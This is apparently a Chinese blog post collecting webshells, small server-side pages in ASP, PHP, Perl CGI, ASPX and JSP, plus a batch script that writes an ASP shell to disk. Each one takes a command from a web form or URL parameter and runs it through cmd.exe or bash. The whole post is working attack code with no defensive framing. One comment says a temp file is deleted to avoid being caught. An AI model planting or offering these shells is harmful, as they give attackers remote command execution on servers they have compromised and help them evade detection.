Cmd Shell ASP/ASPX/JSP/PHP/CGICmd Shell ASP版本执行命令:<br>

<%

Dim oScript

Dim oScriptnet

Dim oFileSys, oFile

Dim szCMD,szTempFile

szCMD=request.form(".cmd")

'从输入框得到cmd

On Error Resume Next

'如果出现错误,直接跳过,防止弹出错误窗口

set oScript=server.createobject("WSCRIPT.SHELL")

'建立shell(wshshell)对象

set oFileSys=server.createobject("scripting.filesystemobject")

szTempFile="C:\"& oFileSys.GetTempName()

'GetTempName()是fso建立临时文件的一种方法

Call oScript.Run ("cmd.exe /c "& szCMD &">" &szTempFile,0,true)

'调用wshshell函数的run来执行命令,并把它重定向到临时文件夹中

set oFile=oFileSys.OpenTextFile(szTempFile,1,False,0)

'以读的方式打开临时文件

%>

<HTML>

<body bgcolor="#C0C0C0" text="#000000">

<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">

<input type=text name=".CMD" size=45 value="<%= szCMD %>">

<input type=submit value="好了" class=input>

</FORM>

<PRE>

<%

On Error Resume Next

response.write server.HTMLEncode(oFile.ReadAll)

'输出编码后的文件内容

oFile.close

'关闭文件

call oFileSys.DeleteFile(szTempFile,True)

'防止被抓住所以删除文件

%>

</body>

</html>



Cmd Shell PHP版本1

cmd.php

<?php

$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");

$exec=$phpwsh->exec("cmd.exe /c ".$_GET['cmd']."");

$stdout = $exec->StdOut();

$stroutput = $stdout->ReadAll();

echo $stroutput;

?>

用法:http://127.0.0.1/cmd.php?cmd=ver

 

Cmd Shell PHP版本2

<html>

<head>

<title>CMD命令行PHP版</title>

<body bgcolor="c0c0c6" text="ffffff">

<center><font size=3 face="黑体" color=red>CMD命令行PHP版</font><br><font size=2 color="000000">by heiyeluren</font><br><br>

<FORM METHOD=POST ACTION="<? echo $PHP_SELF ?>">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" value="执行"> <INPUT TYPE="reset" value="重写">

</FORM>

</center>

<hr>

<font size=2 color="000000">

<?php

if(empty($cmd)) { //判断有没有输入命令

echo "没有输入任何命令!";

} elseif(!is_string($cmd)) { //判断变量是不是字符

echo "你输入的不是命令,请重新输入!";

} else {

echo `$cmd`; //执行获得的变量(命令)

}

?>

</font>

</body>

</html>



Cmd Shell PHP版本3

<FORM ACTION="sys.php" METHOD=POST>

Command: <INPUT TYPE=TEXT NAME=cmd>

<INPUT TYPE=SUBMIT VALUE="Run">

<FORM>

<PRE>

<?php

   if(isset($cmd)) {

       system($cmd);

   }

?>

<PRE>

 

Cmd Shell CGI版本1

use CGI qw(:standard);

print header(-charset=>gb2312);

$cmd=param("cmd");

$out=`$cmd 2>&1`;

print start_form,textfield("cmd",$cmd,60);

print end_form;

print pre($out);



Cmd Shell CGI版本2

#!/usr/bin/perl

require "cgi-lib.pl";

print &PrintHeader;

print "<FORM ACTION=perl_shell.cgi METHOD=GET>\n";

print "<INPUT NAME=cmd TYPE=TEXT>\n";

print "<INPUT TYPE=SUBMIT VALUE=Run>\n";

print "</FORM>\n";

&ReadParse(*in);

if($in{'cmd'} ne "") {

   print "<PRE>\n$in{'cmd'}\n\n";

   print `/bin/bash -c "$in{'cmd'}"`;

   print "</PRE>\n";

}

 

Cmd Shell ASPX版本

<%@ Page Language="C#" Debug="true" Trace="false" %>

<%@ Import Namespace="System.Diagnostics" %>

<%@ Import Namespace="System.IO" %>

<script Language="c#" runat="server">

void Page_Load(object sender, EventArgs e)

{          

}

string ExcuteCmd(string arg)

{

    ProcessStartInfo psi = new ProcessStartInfo();

    psi.FileName = "cmd.exe";

    psi.Arguments = "/c "+arg;

    psi.RedirectStandardOutput = true;

    psi.UseShellExecute = false;

    Process p = Process.Start(psi);

    StreamReader stmrdr = p.StandardOutput;

    string s = stmrdr.ReadToEnd();

    stmrdr.Close();

    return s;

}

void cmdExe_Click(object sender, System.EventArgs e)

{

    Response.Write("<pre>");

    Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));

    Response.Write("</pre>");

}

</script>

<HTML>

<HEAD>

   <title>awen asp.net webshell</title> 

</HEAD>

<body >

   <form id="cmd" method="post" runat="server">  

    <asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>

    <asp:Button id="执行" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>

    <asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">输入命令:</asp:Label>

   </form>

</body>

</HTML>

 

Cmd Shell JSP版本

<FORM METHOD=GET ACTION='cmdexec.jsp'>

<INPUT name='cmd' type=text>

<INPUT type=submit value='Run'>

</FORM>

<%@ page import="java.io.*" %>

<%

   String cmd = request.getParameter("cmd");

   String output = "";

   if(cmd != null) {

      String s = null;

      try {

         Process p = Runtime.getRuntime().exec(cmd);

         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));

         while((s = sI.readLine()) != null) {

            output += s;

         }

      }

      catch(IOException e) {

         e.printStackTrace();

      }

   }

%>

<pre>

<%=output %>

</pre>

 

Cmd Shell Bat版本

echo ^<^% > cmdasp.asp

echo Dim oScript, oScriptNet, oFileSys, oFile, szCMD, szTempFile >> cmdasp.asp

echo On Error Resume Next >> cmdasp.asp

echo Set oScript = Server.CreateObject(^"WSCRIPT.SHELL^") >> cmdasp.asp

echo Set oScriptNet = Server.CreateObject(^"WSCRIPT.NETWORK^") >> cmdasp.asp

echo Set oFileSys = Server.CreateObject(^"Scripting.FileSystemObject^")

     >> cmdasp.asp

echo szCMD = Request.Form(^".CMD^") >> cmdasp.asp

echo If (szCMD ^<^> ^"^") Then >> cmdasp.asp

echo szTempFile = ^"C:\^" & oFileSys.GetTempName() >> cmdasp.asp

echo Call oScript.Run(^"cmd.exe /c ^" ^& szCMD ^& ^" ^> ^" ^& szTempFile,0,True)

     >> cmdasp.asp

echo Set oFle = oFileSys.OpenTextFile(szTempFile,1,False,0) >> cmdasp.asp

echo End If >> cmdasp.asp

echo ^%^> >> cmdasp.asp

echo ^<FORM action=^"^<^%= Request.ServerVariables(^"URL^") ^%^>^" method=^"POST^"^>

     >> cmdasp.asp

echo ^<input type=text name=^".CMD^" size=70 value=^"^<^%= szCMD ^%^>^"^> >> cmdasp.asp

echo ^<input type=submit value=^"Run^"^> >> cmdasp.asp

echo ^</FORM^> >> cmdasp.asp

echo ^<PRE^> >> cmdasp.asp

echo ^<^% >> cmdasp.asp

echo If (IsObject(oFile)) Then >> cmdasp.asp

echo On Error Resume Next >> cmdasp.asp

echo Response.Write Server.HTMLEncode(oFile.ReadAll) >> cmdasp.asp

echo oFile.Close >> cmdasp.asp

echo Call oFileSys.DeleteFile(szTempFile, True) >> cmdasp.asp

echo End If >> cmdasp.asp

echo ^%^> >> cmdasp.asp

echo ^<^/PRE^> >> cmdasp.asp


标签: none

添加新评论